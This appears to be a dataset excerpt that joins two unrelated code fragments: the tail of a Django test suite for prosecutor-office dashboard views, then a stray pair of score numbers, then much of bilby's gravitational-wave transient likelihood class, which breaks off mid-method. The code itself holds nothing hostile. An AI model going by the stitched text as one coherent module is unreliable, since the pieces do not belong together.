"procedimentos": [{"data": 1}, {"data": 2}]
}
url = reverse(
"dominio:pip-principais-investigados-lista",
args=("12345",)
)
resp = self.client.get(url)
_get_perfil.assert_called_once_with(dk=12345, digit=5)
_get_procedimentos.assert_called_once_with(
dk=12345, pess_dk=0, digit=5
)
assert resp.status_code == 200
assert resp.data == expected_output
class TestComparadorRadares(NoJWTTestCase, TestCase):
@mock.patch("dominio.pip.views.PIPComparadorRadaresDAO.execute")
def test_correct_response(self, _execute):
_execute.return_value = [
(
"3456",
"2ª PJ",
"2ª PROMOTORIA",
1.0,
0.0,
None,
0.7,
None
),
(
"6789",
"1ª PJ",
"1ª PROMOTORIA",
1.0,
1.0,
None,
1.0,
None
)
]
url = reverse("dominio:pip-comparador-radares", args=("12345",))
resp = self.client.get(url)
expected_data = [
{
"orgao_id": "3456",
"orgao_codamp": "2ª PJ",
"orgi_nm_orgao": "2ª PROMOTORIA",
"perc_denuncias": 1.0,
"perc_cautelares": 0.0,
"perc_acordos": None,
"perc_arquivamentos": 0.7,
"perc_aberturas_vista": None
},
{
"orgao_id": "6789",
"orgao_codamp": "1ª PJ",
"orgi_nm_orgao": "1ª PROMOTORIA",
"perc_denuncias": 1.0,
"perc_cautelares": 1.0,
"perc_acordos": None,
"perc_arquivamentos": 1.0,
"perc_aberturas_vista": None
}
]
self.assertEqual(resp.status_code, 200)
self.assertEqual(resp.data, expected_data) | 0.708717 | 0.408336 |
import os
import json
import copy
import math
import attr
import numpy as np
import pandas as pd
from scipy.special import logsumexp
from ..core.likelihood import Likelihood
from ..core.utils import BilbyJsonEncoder, decode_bilby_json
from ..core.utils import (
logger, UnsortedInterp2d, create_frequency_series, create_time_series,
speed_of_light, solar_mass, radius_of_earth, gravitational_constant,
round_up_to_power_of_two)
from ..core.prior import Interped, Prior, Uniform, PriorDict, DeltaFunction
from .detector import InterferometerList, get_empty_interferometer, calibration
from .prior import BBHPriorDict, CBCPriorDict, Cosmological
from .source import lal_binary_black_hole
from .utils import (
noise_weighted_inner_product, build_roq_weights, zenith_azimuth_to_ra_dec,
ln_i0
)
from .waveform_generator import WaveformGenerator
class GravitationalWaveTransient(Likelihood):
""" A gravitational-wave transient likelihood object
This is the usual likelihood object to use for transient gravitational
wave parameter estimation. It computes the log-likelihood in the frequency
domain assuming a colored Gaussian noise model described by a power
spectral density. See Thrane & Talbot (2019), arxiv.org/abs/1809.02293.
Parameters
==========
interferometers: list, bilby.gw.detector.InterferometerList
A list of `bilby.detector.Interferometer` instances - contains the
detector data and power spectral densities
waveform_generator: `bilby.waveform_generator.WaveformGenerator`
An object which computes the frequency-domain strain of the signal,
given some set of parameters
distance_marginalization: bool, optional
If true, marginalize over distance in the likelihood.
This uses a look up table calculated at run time.
The distance prior is set to be a delta function at the minimum
distance allowed in the prior being marginalised over.
time_marginalization: bool, optional
If true, marginalize over time in the likelihood.
This uses a FFT to calculate the likelihood over a regularly spaced
grid.
In order to cover the whole space the prior is set to be uniform over
the spacing of the array of times.
If using time marginalisation and jitter_time is True a "jitter"
parameter is added to the prior which modifies the position of the
grid of times.
phase_marginalization: bool, optional
If true, marginalize over phase in the likelihood.
This is done analytically using a Bessel function.
The phase prior is set to be a delta function at phase=0.
calibration_marginalization: bool, optional
If true, marginalize over calibration response curves in the likelihood.
This is done numerically over a number of calibration response curve realizations.
priors: dict, optional
If given, used in the distance and phase marginalization.
Warning: when using marginalisation the dict is overwritten which will change the
the dict you are passing in. If this behaviour is undesired, pass `priors.copy()`.
distance_marginalization_lookup_table: (dict, str), optional
If a dict, dictionary containing the lookup_table, distance_array,
(distance) prior_array, and reference_distance used to construct
the table.
If a string the name of a file containing these quantities.
The lookup table is stored after construction in either the
provided string or a default location:
'.distance_marginalization_lookup_dmin{}_dmax{}_n{}.npz'
calibration_lookup_table: dict, optional
If a dict, contains the arrays over which to marginalize for each interferometer or the filepaths of the
calibration files.
If not provided, but calibration_marginalization is used, then the appropriate file is created to
contain the curves.
number_of_response_curves: int, optional
Number of curves from the calibration lookup table to use.
Default is 1000.
starting_index: int, optional
Sets the index for the first realization of the calibration curve to be considered.
This, coupled with number_of_response_curves, allows for restricting the set of curves used. This can be used
when dealing with large frequency arrays to split the calculation into sections.
Defaults to 0.
jitter_time: bool, optional
Whether to introduce a `time_jitter` parameter. This avoids either
missing the likelihood peak, or introducing biases in the
reconstructed time posterior due to an insufficient sampling frequency.
Default is False, however using this parameter is strongly encouraged.
reference_frame: (str, bilby.gw.detector.InterferometerList, list), optional
Definition of the reference frame for the sky location.
- :code:`sky`: sample in RA/dec, this is the default
- e.g., :code:`"H1L1", ["H1", "L1"], InterferometerList(["H1", "L1"])`:
sample in azimuth and zenith, `azimuth` and `zenith` defined in the
frame where the z-axis is aligned the the vector connecting H1
and L1.
time_reference: str, optional
Name of the reference for the sampled time parameter.
- :code:`geocent`/:code:`geocenter`: sample in the time at the
Earth's center, this is the default
- e.g., :code:`H1`: sample in the time of arrival at H1
Returns
=======
Likelihood: `bilby.core.likelihood.Likelihood`
A likelihood object, able to compute the likelihood of the data given
some model parameters
"""
@attr.s
class _CalculatedSNRs:
d_inner_h = attr.ib()
optimal_snr_squared = attr.ib()
complex_matched_filter_snr = attr.ib()
d_inner_h_array = attr.ib()
optimal_snr_squared_array = attr.ib()
d_inner_h_squared_tc_array = attr.ib()
def __init__(
self, interferometers, waveform_generator, time_marginalization=False,
distance_marginalization=False, phase_marginalization=False, calibration_marginalization=False, priors=None,
distance_marginalization_lookup_table=None, calibration_lookup_table=None,
number_of_response_curves=1000, starting_index=0, jitter_time=True, reference_frame="sky",
time_reference="geocenter"
):
self.waveform_generator = waveform_generator
super(GravitationalWaveTransient, self).__init__(dict())
self.interferometers = InterferometerList(interferometers)
self.time_marginalization = time_marginalization
self.distance_marginalization = distance_marginalization
self.phase_marginalization = phase_marginalization
self.calibration_marginalization = calibration_marginalization
self.priors = priors
self._check_set_duration_and_sampling_frequency_of_waveform_generator()
self.jitter_time = jitter_time
self.reference_frame = reference_frame
if "geocent" not in time_reference:
self.time_reference = time_reference
self.reference_ifo = get_empty_interferometer(self.time_reference)
if self.time_marginalization:
logger.info("Cannot marginalise over non-geocenter time.")
self.time_marginalization = False
self.jitter_time = False
else:
self.time_reference = "geocent"
self.reference_ifo = None
if self.time_marginalization:
self._check_marginalized_prior_is_set(key='geocent_time')
self._setup_time_marginalization()
priors['geocent_time'] = float(self.interferometers.start_time)
if self.jitter_time:
priors['time_jitter'] = Uniform(
minimum=- self._delta_tc / 2,
maximum=self._delta_tc / 2,
boundary='periodic',
name="time_jitter",
latex_label="$t_j$"
)
self._marginalized_parameters.append('geocent_time')
elif self.jitter_time:
logger.debug(
"Time jittering requested with non-time-marginalised "
"likelihood, ignoring.")
self.jitter_time = False
if self.phase_marginalization:
self._check_marginalized_prior_is_set(key='phase')
priors['phase'] = float(0)
self._marginalized_parameters.append('phase')
if self.distance_marginalization:
self._lookup_table_filename = None
self._check_marginalized_prior_is_set(key='luminosity_distance')
self._distance_array = np.linspace(
self.priors['luminosity_distance'].minimum,
self.priors['luminosity_distance'].maximum, int(1e4))
self.distance_prior_array = np.array(
[self.priors['luminosity_distance'].prob(distance)
for distance in self._distance_array])
self._ref_dist = self.priors['luminosity_distance'].rescale(0.5)
self._setup_distance_marginalization(
distance_marginalization_lookup_table)
for key in ['redshift', 'comoving_distance']:
if key in priors:
del priors[key]
priors['luminosity_distance'] = float(self._ref_dist)
self._marginalized_parameters.append('luminosity_distance')
if self.calibration_marginalization:
self.number_of_response_curves = number_of_response_curves
self.starting_index = starting_index
self._setup_calibration_marginalization(calibration_lookup_table)
self._marginalized_parameters.append('recalib_index')
def __repr__(self):
return self.__class__.__name__ + '(interferometers={},\n\twaveform_generator={},\n\ttime_marginalization={}, ' \
'distance_marginalization={}, phase_marginalization={}, '\
'calibration_marginalization={}, priors={})'\
.format(self.interferometers, self.waveform_generator, self.time_marginalization,
self.distance_marginalization, self.phase_marginalization, self.calibration_marginalization,
self.priors)
def _check_set_duration_and_sampling_frequency_of_waveform_generator(self):
""" Check the waveform_generator has the same duration and
sampling_frequency as the interferometers. If they are unset, then
set them, if they differ, raise an error
"""
attributes = ['duration', 'sampling_frequency', 'start_time']
for attribute in attributes:
wfg_attr = getattr(self.waveform_generator, attribute)
ifo_attr = getattr(self.interferometers, attribute)
if wfg_attr is None:
logger.debug(
"The waveform_generator {} is None. Setting from the "
"provided interferometers.".format(attribute))
elif wfg_attr != ifo_attr:
logger.debug(
"The waveform_generator {} is not equal to that of the "
"provided interferometers. Overwriting the "
"waveform_generator.".format(attribute))
setattr(self.waveform_generator, attribute, ifo_attr)
def calculate_snrs(self, waveform_polarizations, interferometer):
"""
Compute the snrs
Parameters
==========
waveform_polarizations: dict
A dictionary of waveform polarizations and the corresponding array
interferometer: bilby.gw.detector.Interferometer
The bilby interferometer object
"""
signal = interferometer.get_detector_response(
waveform_polarizations, self.parameters)
_mask = interferometer.frequency_mask
if 'recalib_index' in self.parameters:
signal[_mask] *= self.calibration_draws[interferometer.name][int(self.parameters['recalib_index'])]
d_inner_h = interferometer.inner_product(signal=signal)
optimal_snr_squared = interferometer.optimal_snr_squared(signal=signal)
complex_matched_filter_snr = d_inner_h / (optimal_snr_squared**0.5)
d_inner_h_array = None
optimal_snr_squared_array = None
if self.time_marginalization and self.calibration_marginalization:
d_inner_h_integrand = np.tile(
interferometer.frequency_domain_strain.conjugate() * signal /
interferometer.power_spectral_density_array, (self.number_of_response_curves, 1)).T
d_inner_h_integrand[_mask] *= self.calibration_draws[interferometer.name].T
d_inner_h_array =\
4 / self.waveform_generator.duration * np.fft.fft(
d_inner_h_integrand[0:-1], axis=0).T
optimal_snr_squared_integrand = 4. / self.waveform_generator.duration *\
np.abs(signal)**2 / interferometer.power_spectral_density_array
optimal_snr_squared_array = np.dot(optimal_snr_squared_integrand[_mask],
self.calibration_abs_draws[interferometer.name].T)
elif self.time_marginalization and not self.calibration_marginalization:
d_inner_h_array =\
4 / self.waveform_generator.duration * np.fft.fft(
signal[0:-1] *
interferometer.frequency_domain_strain.conjugate()[0:-1] /
interferometer.power_spectral_density_array[0:-1])
elif self.calibration_marginalization and ('recalib_index' not in self.parameters):
d_inner_h_integrand = 4. / self.waveform_generator.duration * \
interferometer.frequency_domain_strain.conjugate() * signal / \
interferometer.power_spectral_density_array
d_inner_h_array = np.dot(d_inner_h_integrand[_mask], self.calibration_draws[interferometer.name].T)
optimal_snr_squared_integrand = 4. / self.waveform_generator.duration *\
np.abs(signal)**2 / interferometer.power_spectral_density_array
optimal_snr_squared_array = np.dot(optimal_snr_squared_integrand[_mask],
self.calibration_abs_draws[interferometer.name].T)
return self._CalculatedSNRs(
d_inner_h=d_inner_h, optimal_snr_squared=optimal_snr_squared,
complex_matched_filter_snr=complex_matched_filter_snr,
d_inner_h_array=d_inner_h_array,
optimal_snr_squared_array=optimal_snr_squared_array,
d_inner_h_squared_tc_array=None)
def _check_marginalized_prior_is_set(self, key):
if key in self.priors and self.priors[key].is_fixed:
raise ValueError(
"Cannot use marginalized likelihood for {}: prior is fixed"
.format(key))
if key not in self.priors or not isinstance(
self.priors[key], Prior):
logger.warning(
'Prior not provided for {}, using the BBH default.'.format(key))
if key == 'geocent_time':
self.priors[key] = Uniform(
self.interferometers.start_time,
self.interferometers.start_time + self.interferometers.duration)
elif key == 'luminosity_distance':
for key in ['redshift', 'comoving_distance']:
if key in self.priors:
if not isinstance(self.priors[key], Cosmological):
raise TypeError(
"To marginalize over {}, the prior must be specified as a "
"subclass of bilby.gw.prior.Cosmological.".format(key)
)
self.priors['luminosity_distance'] = self.priors[key].get_corresponding_prior(
'luminosity_distance'
)
del self.priors[key]
else:
self.priors[key] = BBHPriorDict()[key]
@property
def priors(self):
return self._prior
@priors.setter
def priors(self, priors):
if priors is not None:
self._prior = priors.copy()
elif any([self.time_marginalization, self.phase_marginalization,
self.distance_marginalization]):
raise ValueError("You can't use a marginalized likelihood without specifying a priors")
else:
self._prior = None
def noise_log_likelihood(self):
log_l = 0
for interferometer in self.interferometers:
mask = interferometer.frequency_mask
log_l -= noise_weighted_inner_product(
interferometer.frequency_domain_strain[mask],
interferometer.frequency_domain_strain[mask],
interferometer.power_spectral_density_array[mask],
self.waveform_generator.duration) / 2
return float(np.real(log_l))
def log_likelihood_ratio(self):
waveform_polarizations =\
self.waveform_generator.frequency_domain_strain(self.parameters)
self.parameters.update(self.get_sky_frame_parameters())
if waveform_polarizations is None:
return np.nan_to_num(-np.inf)
d_inner_h = 0.
optimal_snr_squared = 0.
complex_matched_filter_snr = 0.
if self.time_marginalization and self.calibration_marginalization:
if self.jitter_time:
self.parameters['geocent_time'] += self.parameters['time_jitter']
d_inner_h_array = np.zeros(
(self.number_of_response_curves, len(self.interferometers.frequency_array[0:-1])),
dtype=np.complex128)
optimal_snr_squared_array = np.zeros(self.number_of_response_curves, dtype=np.complex128)
elif self.time_marginalization:
if self.jitter_time:
self.parameters['geocent_time'] += self.parameters['time_jitter']
d_inner_h_array = np.zeros(
len(self.interferometers.frequency_array[0:-1]),
dtype=np.complex128)
elif self.calibration_marginalization:
d_inner_h_array = np.zeros(self.number_of_response_curves, dtype=np.complex128)
optimal_snr_squared_array = np.zeros(self.number_of_response_curves, dtype=np.complex128)
for interferometer in self.interferometers:
per_detector_snr = self.calculate_snrs(
waveform_polarizations=waveform_polarizations,
interferometer=interferometer)
d_inner_h += per_detector_snr.d_inner_h
optimal_snr_squared += np.real(per_detector_snr.optimal_snr_squared)
complex_matched_filter_snr += per_detector_snr.complex_matched_filter_snr
if self.time_marginalization or self.calibration_marginalization:
d_inner_h_array += per_detector_snr.d_inner_h_array
if self.calibration_marginalization:
optimal_snr_squared_array += per_detector_snr.optimal_snr_squared_array
if self.calibration_marginalization and self.time_marginalization:
log_l = self.time_and_calibration_marginalized_likelihood(
d_inner_h_array=d_inner_h_array,
h_inner_h=optimal_snr_squared_array)
if self.jitter_time:
self.parameters['geocent_time'] -= self.parameters['time_jitter']
elif self.calibration_marginalization:
log_l = self.calibration_marginalized_likelihood(
d_inner_h_calibration_array=d_inner_h_array,
h_inner_h=optimal_snr_squared_array)
elif self.time_marginalization:
log_l = self.time_marginalized_likelihood(
d_inner_h_tc_array=d_inner_h_array,
h_inner_h=optimal_snr_squared)
if self.jitter_time:
self.parameters['geocent_time'] -= self.parameters['time_jitter']
elif self.distance_marginalization:
log_l = self.distance_marginalized_likelihood(
d_inner_h=d_inner_h, h_inner_h=optimal_snr_squared)
elif self.phase_marginalization:
log_l = self.phase_marginalized_likelihood(
d_inner_h=d_inner_h, h_inner_h=optimal_snr_squared)
else:
log_l = np.real(d_inner_h) - optimal_snr_squared / 2
return float(log_l.real)
def generate_posterior_sample_from_marginalized_likelihood(self):
"""
Reconstruct the distance posterior from a run which used a likelihood
which explicitly marginalised over time/distance/phase.
See Eq. (C29-C32) of https://arxiv.org/abs/1809.02293
Returns
=======
sample: dict
Returns the parameters with new samples.
Notes
=====
This involves a deepcopy of the signal to avoid issues with waveform
caching, as the signal is overwritten in place.
"""
if any([self.phase_marginalization, self.distance_marginalization,
self.time_marginalization, self.calibration_marginalization]):
signal_polarizations = copy.deepcopy(
self.waveform_generator.frequency_domain_strain(
self.parameters))
else:
return self.parameters
if self.calibration_marginalization and self.time_marginalization:
raise AttributeError(
"Cannot use time and calibration marginalization simultaneously for regeneration at the moment!"
"The matrix manipulation has not been tested.")
if self.calibration_marginalization:
new_calibration = self.generate_calibration_sample_from_marginalized_likelihood(
signal_polarizations=signal_polarizations)
self.parameters['recalib_index'] = new_calibration
if self.time_marginalization:
new_time = self.generate_time_sample_from_marginalized_likelihood(
signal_polarizations=signal_polarizations)
self.parameters['geocent_time'] = new_time
if self.distance_marginalization:
new_distance = self.generate_distance_sample_from_marginalized_likelihood(
signal_polarizations=signal_polarizations)
self.parameters['luminosity_distance'] = new_distance
if self.phase_marginalization:
new_phase = self.generate_phase_sample_from_marginalized_likelihood(
signal_polarizations=signal_polarizations)
self.parameters['phase'] = new_phase
return self.parameters.copy()
def generate_calibration_sample_from_marginalized_likelihood(
self, signal_polarizations=None):
"""
Generate a single sample from the posterior distribution for the set of calibration response curves when
explicitly marginalizing over the calibration uncertainty.
Parameters
----------
signal_polarizations: dict, optional
Polarizations modes of the template.
Returns
-------
new_calibration: dict
Sample set from the calibration posterior
"""
if 'recalib_index' in self.parameters:
self.parameters.pop('recalib_index')
self.parameters.update(self.get_sky_frame_parameters())
if signal_polarizations is None:
signal_polarizations = \
self.waveform_generator.frequency_domain_strain(self.parameters)
log_like = self.get_calibration_log_likelihoods(signal_polarizations=signal_polarizations)
calibration_post = np.exp(log_like - max(log_like))
calibration_post /= np.sum(calibration_post)
new_calibration = np.random.choice(self.number_of_response_curves, p=calibration_post)
return new_calibration
def generate_time_sample_from_marginalized_likelihood(
self, signal_polarizations=None):
"""
Generate a single sample from the posterior distribution for coalescence
time when using a likelihood which explicitly marginalises over time.
In order to resolve the posterior we artificially upsample to 16kHz.
See Eq. (C29-C32) of https://arxiv.org/abs/1809.02293
Parameters
==========
signal_polarizations: dict, optional
Polarizations modes of the template.
Returns
=======
new_time: float
Sample from the time posterior.
"""
self.parameters.update(self.get_sky_frame_parameters())
if self.jitter_time:
self.parameters['geocent_time'] += self.parameters['time_jitter']
if signal_polarizations is None:
signal_polarizations = \
self.waveform_generator.frequency_domain_strain(self.parameters)
times = create_time_series(
sampling_frequency=16384,
starting_time=self.parameters['geocent_time'] - self.waveform_generator.start_time,
duration=self.waveform_generator.duration)
times = times % self.waveform_generator.duration
times += self.waveform_generator.start_time
prior = self.priors["geocent_time"]
in_prior = (times >= prior.minimum) & (times < prior.maximum)
times = times[in_prior]
n_time_steps = int(self.waveform_generator.duration * 16384)
d_inner_h = np.zeros(len(times), dtype=complex)
psd = np.ones(n_time_steps)
signal_long = np.zeros(n_time_steps, dtype=complex)
data = np.zeros(n_time_steps, dtype=complex)
h_inner_h = np.zeros(1)
for ifo in self.interferometers:
ifo_length = len(ifo.frequency_domain_strain)
mask = ifo.frequency_mask
signal = ifo.get_detector_response(
signal_polarizations, self.parameters)
signal_long[:ifo_length] = signal
data[:ifo_length] = np.conj(ifo.frequency_domain_strain)
psd[:ifo_length][mask] = ifo.power_spectral_density_array[mask]
d_inner_h += np.fft.fft(signal_long * data / psd)[in_prior]
h_inner_h += ifo.optimal_snr_squared(signal=signal).real
if self.distance_marginalization:
time_log_like = self.distance_marginalized_likelihood(
d_inner_h, h_inner_h)
elif self.phase_marginalization:
time_log_like = ln_i0(abs(d_inner_h)) - h_inner_h.real / 2
else:
time_log_like = (d_inner_h.real - h_inner_h.real / 2)
time_prior_array = self.priors['geocent_time'].prob(times)
time_post = (
np.exp(time_log_like - max(time_log_like)) * time_prior_array)
keep = (time_post > max(time_post) / 1000)
if sum(keep) < 3:
keep[1:-1] = keep[1:-1] | keep[2:] | keep[:-2]
time_post = time_post[keep]
times = times[keep]
new_time = Interped(times, time_post).sample()
return new_time
def generate_distance_sample_from_marginalized_likelihood(
self, signal_polarizations=None):
"""
Generate a single sample from the posterior distribution for luminosity
distance when using a likelihood which explicitly marginalises over
distance.
See Eq. (C29-C32) of https://arxiv.org/abs/1809.02293
Parameters
==========
signal_polarizations: dict, optional
Polarizations modes of the template.
Note: These are rescaled in place after the distance sample is
generated to allow further parameter reconstruction to occur.
Returns
=======
new_distance: float
Sample from the distance posterior.
"""
self.parameters.update(self.get_sky_frame_parameters())
if signal_polarizations is None:
signal_polarizations = \
self.waveform_generator.frequency_domain_strain(self.parameters)
d_inner_h, h_inner_h = self._calculate_inner_products(signal_polarizations)
d_inner_h_dist = (
d_inner_h * self.parameters['luminosity_distance'] /
self._distance_array)
h_inner_h_dist = (
h_inner_h * self.parameters['luminosity_distance']**2 /
self._distance_array**2)
if self.phase_marginalization:
distance_log_like = (
ln_i0(abs(d_inner_h_dist)) -
h_inner_h_dist.real / 2
)
else:
distance_log_like = (d_inner_h_dist.real - h_inner_h_dist.real / 2)
distance_post = (np.exp(distance_log_like - max(distance_log_like)) *
self.distance_prior_array)
new_distance = Interped(
self._distance_array, distance_post).sample()
self._rescale_signal(signal_polarizations, new_distance)
return new_distance
def _calculate_inner_products(self, signal_polarizations):
d_inner_h = 0
h_inner_h = 0
for interferometer in self.interferometers:
per_detector_snr = self.calculate_snrs(
signal_polarizations, interferometer)
d_inner_h += per_detector_snr.d_inner_h
h_inner_h += per_detector_snr.optimal_snr_squared
return d_inner_h, h_inner_h
def generate_phase_sample_from_marginalized_likelihood(
self, signal_polarizations=None):
"""
Generate a single sample from the posterior distribution for phase when
using a likelihood which explicitly marginalises over phase.
See Eq. (C29-C32) of https://arxiv.org/abs/1809.02293
Parameters
==========
signal_polarizations: dict, optional
Polarizations modes of the template.
Returns
=======
new_phase: float
Sample from the phase posterior.
Notes
=====
This is only valid when assumes that mu(phi) \propto exp(-2i phi).
"""
self.parameters.update(self.get_sky_frame_parameters())
if signal_polarizations is None:
signal_polarizations = \
self.waveform_generator.frequency_domain_strain(self.parameters)
d_inner_h, h_inner_h = self._calculate_inner_products(signal_polarizations)
phases = np.linspace(0, 2 * np.pi, 101)
phasor = np.exp(-2j * phases)
phase_log_post = d_inner_h * phasor - h_inner_h / 2
phase_post = np.exp(phase_log_post.real - max(phase_log_post.real))
new_phase = Interped(phases, phase_post).sample()
return new_phase
def distance_marginalized_likelihood(self, d_inner_h, h_inner_h):
d_inner_h_ref, h_inner_h_ref = self._setup_rho(
d_inner_h, h_inner_h)
if self.phase_marginalization:
d_inner_h_ref = np.abs(d_inner_h_ref)
else:
d_inner_h_ref = np.real(d_inner_h_ref)
return self._interp_dist_margd_loglikelihood(
d_inner_h_ref, h_inner_h_ref)
def phase_marginalized_likelihood(self, d_inner_h, h_inner_h):
d_inner_h = ln_i0(abs(d_inner_h))
if self.calibration_marginalization and self.time_marginalization:
return d_inner_h - np.outer(h_inner_h, np.ones(np.shape(d_inner_h)[1])) / 2
else:
return d_inner_h - h_inner_h / 2
def time_marginalized_likelihood(self, d_inner_h_tc_array, h_inner_h):
if self.distance_marginalization:
log_l_tc_array = self.distance_marginalized_likelihood(
d_inner_h=d_inner_h_tc_array, h_inner_h=h_inner_h)
elif self.phase_marginalization:
log_l_tc_array = self.phase_marginalized_likelihood(
d_inner_h=d_inner_h_tc_array,
h_inner_h=h_inner_h)
else:
log_l_tc_array = np.real(d_inner_h_tc_array) - h_inner_h / 2
times = self._times
if self.jitter_time:
times = self._times + self.parameters['time_jitter']
time_prior_array = self.priors['geocent_time'].prob(times) * self._delta_tc
return logsumexp(log_l_tc_array, b=time_prior_array)
def time_and_calibration_marginalized_likelihood(self, d_inner_h_array, h_inner_h):
times = self._times
if self.jitter_time:
times = self._times + self.parameters['time_jitter']
_time_prior = self.priors['geocent_time']
time_mask = np.logical_and((times >= _time_prior.minimum), (times <= _time_prior.maximum))
times = times[time_mask]
time_probs = self.priors['geocent_time'].prob(times) * self._delta_tc
d_inner_h_array = d_inner_h_array[:, time_mask]
h_inner_h = h_inner_h
if self.distance_marginalization:
log_l_array = self.distance_marginalized_likelihood(
d_inner_h=d_inner_h_array, h_inner_h=h_inner_h)
elif self.phase_marginalization:
log_l_array = self.phase_marginalized_likelihood(
d_inner_h=d_inner_h_array,
h_inner_h=h_inner_h)
else:
log_l_array = np.real(d_inner_h_array) - np.outer(h_inner_h, np.ones(np.shape(d_inner_h_array)[1])) / 2
prior_array = np.outer(time_probs, 1. / self.number_of_response_curves * np.ones(len(h_inner_h))).T
return logsumexp(log_l_array, b=prior_array)
def get_calibration_log_likelihoods(self, signal_polarizations=None):
self.parameters.update(self.get_sky_frame_parameters())
if signal_polarizations is None:
signal_polarizations =\
self.waveform_generator.frequency_domain_strain(self.parameters)
d_inner_h = 0.
optimal_snr_squared = 0.
complex_matched_filter_snr = 0.
d_inner_h_array = np.zeros(self.number_of_response_curves, dtype=np.complex128)
optimal_snr_squared_array = np.zeros(self.number_of_response_curves, dtype=np.complex128)
for interferometer in self.interferometers:
per_detector_snr = self.calculate_snrs(
waveform_polarizations=signal_polarizations,
interferometer=interferometer)
d_inner_h += per_detector_snr.d_inner_h
optimal_snr_squared += np.real(per_detector_snr.optimal_snr_squared)
complex_matched_filter_snr += per_detector_snr.complex_matched_filter_snr
d_inner_h_array += per_detector_snr.d_inner_h_array
optimal_snr_squared_array += per_detector_snr.optimal_snr_squared_array
if self.distance_marginalization:
log_l_cal_array = self.distance_marginalized_likelihood(
d_inner_h=d_inner_h_array, h_inner_h=optimal_snr_squared_array)
elif self.phase_marginalization:
log_l_cal_array = self.phase_marginalized_likelihood(
d_inner_h=d_inner_h_array,
h_inner_h=optimal_snr_squared_array)
else:
log_l_cal_array = np.real(d_inner_h_array - optimal_snr_squared_array / 2)
return log_l_cal_array
def calibration_marginalized_likelihood(self, d_inner_h_calibration_array, h_inner_h):
if self.distance_marginalization:
log_l_cal_array = self.distance_marginalized_likelihood(
d_inner_h=d_inner_h_calibration_array, h_inner_h=h_inner_h)
elif self.phase_marginalization:
log_l_cal_array = self.phase_marginalized_likelihood(
d_inner_h=d_inner_h_calibration_array,
h_inner_h=h_inner_h)
else:
log_l_cal_array = np.real(d_inner_h_calibration_array - h_inner_h / 2)
return logsumexp(log_l_cal_array) - np.log(self.number_of_response_curves)
def _setup_rho(self, d_inner_h, optimal_snr_squared):
optimal_snr_squared_ref = (optimal_snr_squared.real *
self.parameters['luminosity_distance'] ** 2 /
self._ref_dist ** 2.)
d_inner_h_ref = (d_inner_h * self.parameters['luminosity_distance'] /
self._ref_dist)
return d_inner_h_ref, optimal_snr_squared_ref
def log_likelihood(self):
return self.log_likelihood_ratio() + self.noise_log_likelihood()
@property
def _delta_distance(self):
return self._distance_array[1] - self._distance_array[0]
@property
def _dist_multiplier(self):
''' Maximum value of ref_dist/dist_array '''
return self._ref_dist / self._distance_array[0]
@property
def _optimal_snr_squared_ref_array(self):
""" Optimal filter snr at fiducial distance of ref_dist Mpc """
return np.logspace(-5, 10, self._dist_margd_loglikelihood_array.shape[0])
@property
def _d_inner_h_ref_array(self):
""" Matched filter snr at fiducial distance of ref_dist Mpc """
if self.phase_marginalization:
return np.logspace(-5, 10, self._dist_margd_loglikelihood_array.shape[1])
else:
n_negative = self._dist_margd_loglikelihood_array.shape[1] // 2
n_positive = self._dist_margd_loglikelihood_array.shape[1] - n_negative
return np.hstack((
-np.logspace(3, -3, n_negative), np.logspace(-3, 10, n_positive)
))
def _setup_distance_marginalization(self, lookup_table=None):
if isinstance(lookup_table, str) or lookup_table is None:
self.cached_lookup_table_filename = lookup_table
lookup_table = self.load_lookup_table(
self.cached_lookup_table_filename)
if isinstance(lookup_table, dict):
if self._test_cached_lookup_table(lookup_table):
self._dist_margd_loglikelihood_array = lookup_table[
'lookup_table']
else:
self._create_lookup_table()
else:
self._create_lookup_table()
self._interp_dist_margd_loglikelihood = UnsortedInterp2d(
self._d_inner_h_ref_array, self._optimal_snr_squared_ref_array,
self._dist_margd_loglikelihood_array, kind='cubic', fill_value=-np.inf)
@property
def cached_lookup_table_filename(self):
if self._lookup_table_filename is None:
self._lookup_table_filename = (
'.distance_marginalization_lookup.npz')
return self._lookup_table_filename
@cached_lookup_table_filename.setter
def cached_lookup_table_filename(self, filename):
if isinstance(filename, str):
if filename[-4:] != '.npz':
filename += '.npz'
self._lookup_table_filename = filename
def load_lookup_table(self, filename):
if os.path.exists(filename):
try:
loaded_file = dict(np.load(filename))
except AttributeError as e:
logger.warning(e)
self._create_lookup_table()
return None
match, failure = self._test_cached_lookup_table(loaded_file)
if match:
logger.info('Loaded distance marginalisation lookup table from '
'{}.'.format(filename))
return loaded_file
else:
logger.info('Loaded distance marginalisation lookup table does '
'not match for {}.'.format(failure))
elif isinstance(filename, str):
logger.info('Distance marginalisation file {} does not '
'exist'.format(filename))
return None
def cache_lookup_table(self):
np.savez(self.cached_lookup_table_filename,
distance_array=self._distance_array,
prior_array=self.distance_prior_array,
lookup_table=self._dist_margd_loglikelihood_array,
reference_distance=self._ref_dist,
phase_marginalization=self.phase_marginalization)
def _test_cached_lookup_table(self, loaded_file):
pairs = dict(
distance_array=self._distance_array,
prior_array=self.distance_prior_array,
reference_distance=self._ref_dist,
phase_marginalization=self.phase_marginalization)
for key in pairs:
if key not in loaded_file:
return False, key
elif not np.array_equal(np.atleast_1d(loaded_file[key]),
np.atleast_1d(pairs[key])):
return False, key
return True, None
def _create_lookup_table(self):
""" Make the lookup table """
from tqdm.auto import tqdm
logger.info('Building lookup table for distance marginalisation.')
self._dist_margd_loglikelihood_array = np.zeros((400, 800))
scaling = self._ref_dist / self._distance_array
d_inner_h_array_full = np.outer(self._d_inner_h_ref_array, scaling)
h_inner_h_array_full = np.outer(self._optimal_snr_squared_ref_array, scaling ** 2)
if self.phase_marginalization:
d_inner_h_array_full = ln_i0(abs(d_inner_h_array_full))
prior_term = self.distance_prior_array * self._delta_distance
for ii, optimal_snr_squared_array in tqdm(
enumerate(h_inner_h_array_full), total=len(self._optimal_snr_squared_ref_array)
):
for jj, d_inner_h_array in enumerate(d_inner_h_array_full):
self._dist_margd_loglikelihood_array[ii][jj] = logsumexp(
d_inner_h_array - optimal_snr_squared_array / 2,
b=prior_term
)
log_norm = logsumexp(
0 / self._distance_array, b=self.distance_prior_array * self._delta_distance
)
self._dist_margd_loglikelihood_array -= log_norm
self.cache_lookup_table()
def _setup_phase_marginalization(self, min_bound=-5, max_bound=10):
logger.warning(
"The _setup_phase_marginalization method is deprecated and will be removed, "
"please update the implementation of phase marginalization "
"to use bilby.gw.utils.ln_i0"
)
@staticmethod
def _bessel_function_interped(xx):
logger.warning(
